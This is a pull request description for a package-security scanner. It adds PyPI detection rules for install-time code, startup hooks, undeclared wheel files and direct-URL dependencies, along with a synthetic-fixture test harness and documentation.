- Upgrade the PyPI adapter (`PYPI_RULES_VERSION` `0.2.0`): `setup-install-command` now fires on top-level install-time code, plus new rules for sitecustomize/usercustomize startup hooks, RECORD-undeclared wheel files, and PEP 508 direct-URL dependencies.
- Add a parallel golden-corpus harness (`test/security-corpus-pypi.test.mjs`) with 13 synthetic fixtures pinning exact rule IDs, severity, and risk, with a per-family ruleVersion invariant.
- Document the PyPI corpus, the two path-namespacing schemes, and known coverage gaps in `docs/security-detection-corpus.md` and the fixtures README.

## Test plan
- [ ] `pnpm run verify` (lint + format + typecheck + node & worker test pools) — green locally